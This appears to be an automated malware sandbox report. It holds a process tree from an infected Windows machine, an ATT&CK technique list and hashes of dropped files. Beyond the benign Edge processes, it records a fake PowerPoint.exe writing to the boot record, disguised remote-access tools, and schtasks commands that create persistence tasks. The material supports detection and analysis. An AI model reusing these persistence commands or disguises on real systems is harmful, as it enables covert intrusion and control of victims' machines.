  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2212,655453530693053498,4034563151471660449,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=51 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4740 /prefetch:1
  2⤵
  PID:5720
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2212,655453530693053498,4034563151471660449,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=52 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7888 /prefetch:1
  2⤵
  PID:5836
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2212,655453530693053498,4034563151471660449,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=53 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7000 /prefetch:1
  2⤵
  PID:1856
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2212,655453530693053498,4034563151471660449,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=55 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8600 /prefetch:1
  2⤵
  PID:5592
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2212,655453530693053498,4034563151471660449,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=8736 /prefetch:8
  2⤵
  PID:4000
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2212,655453530693053498,4034563151471660449,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=57 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9032 /prefetch:1
  2⤵
  PID:32
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2212,655453530693053498,4034563151471660449,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=58 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7196 /prefetch:1
  2⤵
  PID:1744
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2212,655453530693053498,4034563151471660449,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=59 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9180 /prefetch:1
  2⤵
  PID:4588
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2212,655453530693053498,4034563151471660449,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=60 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8144 /prefetch:1
  2⤵
  PID:4316
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2212,655453530693053498,4034563151471660449,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=62 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8744 /prefetch:1
  2⤵
  PID:5424
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2212,655453530693053498,4034563151471660449,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=9064 /prefetch:8
  2⤵
  PID:5288
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2212,655453530693053498,4034563151471660449,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=64 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6324 /prefetch:1
  2⤵
  PID:5688
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2212,655453530693053498,4034563151471660449,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=65 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6164 /prefetch:1
  2⤵
  PID:1180
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2212,655453530693053498,4034563151471660449,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=66 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5336 /prefetch:1
  2⤵
  PID:5032
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2212,655453530693053498,4034563151471660449,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=67 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7624 /prefetch:1
  2⤵
  PID:5632
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2212,655453530693053498,4034563151471660449,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=68 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9140 /prefetch:1
  2⤵
  PID:1160
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2212,655453530693053498,4034563151471660449,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=69 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7504 /prefetch:1
  2⤵
  PID:1456
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2212,655453530693053498,4034563151471660449,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=70 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7708 /prefetch:1
  2⤵
  PID:4636
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2212,655453530693053498,4034563151471660449,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=71 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7880 /prefetch:1
  2⤵
  PID:1452
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2212,655453530693053498,4034563151471660449,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=72 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7840 /prefetch:1
  2⤵
  PID:3992
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2212,655453530693053498,4034563151471660449,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=73 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=10184 /prefetch:1
  2⤵
  PID:4648
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2212,655453530693053498,4034563151471660449,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=74 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7316 /prefetch:1
  2⤵
  PID:5264
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2212,655453530693053498,4034563151471660449,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=75 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=11052 /prefetch:1
  2⤵
  PID:64
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2212,655453530693053498,4034563151471660449,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=76 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9364 /prefetch:1
  2⤵
  PID:5604
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2212,655453530693053498,4034563151471660449,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=77 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9420 /prefetch:1
  2⤵
  PID:6512
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2212,655453530693053498,4034563151471660449,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=78 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=10204 /prefetch:1
  2⤵
  PID:6624
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2212,655453530693053498,4034563151471660449,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=79 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9552 /prefetch:1
  2⤵
  PID:6836
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2212,655453530693053498,4034563151471660449,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=80 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7572 /prefetch:1
  2⤵
  PID:6556
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2212,655453530693053498,4034563151471660449,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=81 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8116 /prefetch:1
  2⤵
  PID:7028
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2212,655453530693053498,4034563151471660449,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=82 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9700 /prefetch:1
  2⤵
  PID:7108
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2212,655453530693053498,4034563151471660449,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=83 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=10824 /prefetch:1
  2⤵
  PID:6780
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2212,655453530693053498,4034563151471660449,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=84 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=11008 /prefetch:1
  2⤵
  PID:5640
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2212,655453530693053498,4034563151471660449,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=85 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3636 /prefetch:1
  2⤵
  PID:6628
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2212,655453530693053498,4034563151471660449,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=86 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=11572 /prefetch:1
  2⤵
  PID:5884
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2212,655453530693053498,4034563151471660449,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=87 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=12052 /prefetch:1
  2⤵
  PID:4956
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2212,655453530693053498,4034563151471660449,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=88 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7996 /prefetch:1
  2⤵
  PID:5276
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2212,655453530693053498,4034563151471660449,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=90 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7880 /prefetch:1
  2⤵
  PID:5156
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=2212,655453530693053498,4034563151471660449,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=11452 /prefetch:8
  2⤵
  PID:4912
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2212,655453530693053498,4034563151471660449,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=10560 /prefetch:8
  2⤵
  PID:6168
- C:\Users\Admin\Downloads\PowerPoint.exe
  "C:\Users\Admin\Downloads\PowerPoint.exe"
  2⤵
  - Executes dropped EXE
  - Writes to the Master Boot Record (MBR)
  - NTFS ADS
  PID:5880
- - C:\Users\Admin\AppData\Local\Temp\sys3.exe
    C:\Users\Admin\AppData\Local\Temp\\sys3.exe
    3⤵
    - Executes dropped EXE
    - Writes to the Master Boot Record (MBR)
    - System Location Discovery: System Language Discovery
    PID:4432

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:4776

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:4628

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:1352

C:\Users\Admin\Downloads\607B60AD512C50B7D71DCCC057E85F1C.exe
"C:\Users\Admin\Downloads\607B60AD512C50B7D71DCCC057E85F1C.exe"
1⤵
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
PID:4184

C:\ProgramData\Windows\rutserv.exe
C:\ProgramData\Windows\rutserv.exe
1⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:3360
- C:\ProgramData\Windows\rfusclient.exe
  C:\ProgramData\Windows\rfusclient.exe
  2⤵
  - Executes dropped EXE
  - Suspicious behavior: EnumeratesProcesses
  PID:1116
- - C:\ProgramData\Windows\rfusclient.exe
    C:\ProgramData\Windows\rfusclient.exe /tray
    3⤵
    - Executes dropped EXE
    - Suspicious behavior: SetClipboardViewer
    PID:744
- C:\ProgramData\Windows\rfusclient.exe
  C:\ProgramData\Windows\rfusclient.exe /tray
  2⤵
  - Executes dropped EXE
  PID:4596

C:\Windows\system32\msiexec.exe
C:\Windows\system32\msiexec.exe /V
1⤵
- Modifies WinLogon for persistence
- Enumerates connected drives
- Drops file in Program Files directory
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:3620
- C:\Windows\syswow64\MsiExec.exe
  C:\Windows\syswow64\MsiExec.exe -Embedding DE4BE4E05AEB7EA36748F6F836F71585
  2⤵
  - Loads dropped DLL
  - Blocklisted process makes network request
  PID:688
- C:\Windows\syswow64\MsiExec.exe
  C:\Windows\syswow64\MsiExec.exe -Embedding A4BC9E5D893518B84DAEE2204FC9A7AC E Global\MSI0000
  2⤵
  - Loads dropped DLL
  - Drops file in Windows directory
  PID:4188

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc
1⤵
PID:2336

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
1⤵
PID:2420

C:\Windows\system32\backgroundTaskHost.exe
"C:\Windows\system32\backgroundTaskHost.exe" -ServerName:App.AppXmtcan0h2tfbfy7k9kn8hbxb6dmzz1zh0.mca
1⤵
PID:3020

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -s TermService
1⤵
PID:1680

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -s TermService
1⤵
- Loads dropped DLL
PID:4628

C:\Windows\system32\backgroundTaskHost.exe
"C:\Windows\system32\backgroundTaskHost.exe" -ServerName:App.AppXmtcan0h2tfbfy7k9kn8hbxb6dmzz1zh0.mca
1⤵
PID:2268

C:\Windows\system32\AUDIODG.EXE
C:\Windows\system32\AUDIODG.EXE 0x304 0x49c
1⤵
PID:4952

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:4924

C:\Programdata\RealtekHD\taskhostw.exe
C:\Programdata\RealtekHD\taskhostw.exe
1⤵
- Executes dropped EXE
PID:5592

C:\Programdata\RealtekHD\taskhostw.exe
C:\Programdata\RealtekHD\taskhostw.exe
1⤵
- Executes dropped EXE
PID:5652

C:\Programdata\RealtekHD\taskhostw.exe
C:\Programdata\RealtekHD\taskhostw.exe
1⤵
- Executes dropped EXE
PID:2096

C:\Users\Admin\Downloads\Solara\lua.exe
"C:\Users\Admin\Downloads\Solara\lua.exe"
1⤵
PID:3936

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Downloads\Solara\Application.bat" "
1⤵
PID:5984
- C:\Users\Admin\Downloads\Solara\lua.exe
  lua.exe cache.txt
  2⤵
  - Drops file in Windows directory
  - System Location Discovery: System Language Discovery
  PID:4400
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /create /sc daily /st 13:55 /f /tn SystemRestorePointCreation_ODA3 /tr ""C:\Users\Admin\AppData\Local\ODA3\ODA3.exe" "C:\Users\Admin\AppData\Local\ODA3\cache.txt""
    3⤵
    - Scheduled Task/Job: Scheduled Task
    PID:5616
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /create /sc daily /st 13:55 /f /tn Setup /tr "C:/Windows/System32/oobe/Setup.exe" /rl highest
    3⤵
    - Scheduled Task/Job: Scheduled Task
    PID:3608

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Downloads\Solara\Application.bat" "
1⤵
PID:5412
- C:\Users\Admin\Downloads\Solara\lua.exe
  lua.exe cache.txt
  2⤵
  PID:3240

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Downloads\Solara\Application.bat" "
1⤵
PID:4460
- C:\Users\Admin\Downloads\Solara\lua.exe
  lua.exe cache.txt
  2⤵
  PID:2328

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Downloads\Solara\Application.bat" "
1⤵
PID:2292
- C:\Users\Admin\Downloads\Solara\lua.exe
  lua.exe cache.txt
  2⤵
  PID:3992

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Downloads\Solara\Application.bat" "
1⤵
PID:4416
- C:\Users\Admin\Downloads\Solara\lua.exe
  lua.exe cache.txt
  2⤵
  PID:2292

C:\Programdata\RealtekHD\taskhostw.exe
C:\Programdata\RealtekHD\taskhostw.exe
1⤵
- Executes dropped EXE
PID:980

C:\Programdata\RealtekHD\taskhostw.exe
C:\Programdata\RealtekHD\taskhostw.exe
1⤵
- Executes dropped EXE
PID:2800

C:\Programdata\RealtekHD\taskhostw.exe
C:\Programdata\RealtekHD\taskhostw.exe
1⤵
- Executes dropped EXE
PID:6768

C:\Programdata\RealtekHD\taskhostw.exe
C:\Programdata\RealtekHD\taskhostw.exe
1⤵
- Executes dropped EXE
PID:5948

C:\Windows\system32\LogonUI.exe
"LogonUI.exe" /flags:0x4 /state0:0xa3eb6055 /state1:0x41c64e6d
1⤵
- Modifies data under HKEY_USERS
- Suspicious use of SetWindowsHookEx
PID:5252

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe shell32.dll,SHCreateLocalServerRunDll {9BA05972-F6A8-11CF-A442-00A0C90A8F39} -Embedding
1⤵
PID:648

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe shell32.dll,SHCreateLocalServerRunDll {9BA05972-F6A8-11CF-A442-00A0C90A8F39} -Embedding
1⤵
PID:900

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

System Services

T1569

Service Execution

T1569.002

Persistence

Account Manipulation

T1098

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Winlogon Helper DLL

T1547.004

Create or Modify System Process

T1543

Windows Service

T1543.003

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Pre-OS Boot

T1542

Bootkit

T1542.003

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Server Software Component

T1505

Terminal Services DLL

T1505.005

Privilege Escalation

Abuse Elevation Control Mechanism

T1548

Bypass User Account Control

T1548.002

Account Manipulation

T1098

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Winlogon Helper DLL

T1547.004

Create or Modify System Process

T1543

Windows Service

T1543.003

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Defense Evasion

Abuse Elevation Control Mechanism

T1548

Bypass User Account Control

T1548.002

File and Directory Permissions Modification

T1222

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Hidden Users

T1564.002

Impair Defenses

T1562

Disable or Modify System Firewall

T1562.004

Disable or Modify Tools

T1562.001

Indicator Removal

T1070

Clear Persistence

T1070.009

Modify Registry

T1112

Pre-OS Boot

T1542

Bootkit

T1542.003

Credential Access

Discovery

Browser Information Discovery

T1217

Password Policy Discovery

T1201

Peripheral Device Discovery

T1120

Permission Groups Discovery

T1069

Local Groups

T1069.001

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Remote Service Session Hijacking

T1563

RDP Hijacking

T1563.002

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Service Stop

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Config.Msi\e63e131.rbs

Filesize
99KB

MD5
dafd6c18622a62cadd543499806e5a6e

SHA1
908505ab0a72962b2e6b2b2329a533406f43a0cb

SHA256
db4ebdeaac7fec39e63ebd1bc76826d0d2f2fb9f64aa1f4e888f7f353711fcbc

SHA512
affb91e0737808629dbccbc5756eadd22bb2c7c99960ffcdbcc822db25b534bba3d49cdd62d20a940c7cb848548aec5aba68c39883e3f635289e916ecbed9616

Download Submit
C:\ProgramData\Microsoft\Intel\taskhost.exe

Filesize
3.6MB

MD5
c5ec8996fc800325262f5d066f5d61c9

SHA1
95f8e486960d1ddbec88be92ef71cb03a3643291

SHA256
892e0afefca9c88d43bdd1beea0f09faadef618af0226e7cd1acdb47e871a0db

SHA512
4721692047759aea6cb6e5c6abf72602c356ab826326779e126cda329fa3f7e4c468bdb651bb664cc7638a23fca77bc2d006a3fe0794badc09d6643d738e885a

Download Submit
C:\ProgramData\Microsoft\Intel\winlogon.exe

Filesize
35KB

MD5
2f6a1bffbff81e7c69d8aa7392175a72

SHA1
94ac919d2a20aa16156b66ed1c266941696077da

SHA256
dc6d63798444d1f614d4a1ff8784ad63b557f4d937d90a3ad9973c51367079de

SHA512
ff09ef0e7a843b35d75487ad87d9a9d99fc943c0966a36583faa331eb0a243c352430577bc0662149a969dbcaa22e2b343bed1075b14451c4e9e0fe8fa911a37

Download Submit
C:\ProgramData\Windows\install.vbs

Filesize
140B

MD5
5e36713ab310d29f2bdd1c93f2f0cad2

SHA1
7e768cca6bce132e4e9132e8a00a1786e6351178

SHA256
cd8df8b0c43c36aabb0a960e4444b000a04eb513f0b34e12dbfd098944e40931

SHA512
8e5cf90470163143aee75b593e52fcc39e6477cd69a522ee77fa2589ea22b8a3a1c23614d3a677c8017fba0bf4b320a4e47c56a9a7f176dbf51db88d9d8e52c1

Download Submit
C:\ProgramData\Windows\reg1.reg

Filesize
12KB

MD5
806734f8bff06b21e470515e314cfa0d

SHA1
d4ef2552f6e04620f7f3d05f156c64888c9c97ee

SHA256
7ae7e4c0155f559f3c31be25d9e129672a88b445af5847746fe0a9aab3e79544

SHA512
007a79f0023a792057b81483f7428956ab99896dd1c8053cac299de5834ac25da2f6f77b63f6c7d46c51ed7a91b8eccb1c082043028326bfa0bfcb47f2b0d207

Download Submit
C:\ProgramData\Windows\reg2.reg

Filesize
1KB

MD5
6a5d2192b8ad9e96a2736c8b0bdbd06e

SHA1
235a78495192fc33f13af3710d0fe44e86a771c9

SHA256
4ae04a85412ec3daa0fb33f21ed4eb3c4864c3668b95712be9ec36ef7658422a

SHA512
411204a0a1cdbe610830fb0be09fd86c579bb5cccf46e2e74d075a5693fe7924e1e2ba121aa824af66c7521fcc452088b2301321d9d7eb163bee322f2f58640d

Download Submit
C:\ProgramData\Windows\rfusclient.exe

Filesize
1.5MB

MD5
b8667a1e84567fcf7821bcefb6a444af

SHA1
9c1f91fe77ad357c8f81205d65c9067a270d61f0

SHA256
dc9d875e659421a51addd8e8a362c926369e84320ab0c5d8bbb1e4d12d372fc9

SHA512
ec6af663a3b41719d684f04504746f91196105ef6f8baa013b4bd02df6684eca49049d5517691f8e3a4ba6351fe35545a27f728b1d29d949e950d574a012f852

Download Submit
C:\ProgramData\Windows\rutserv.exe

Filesize
1.7MB

MD5
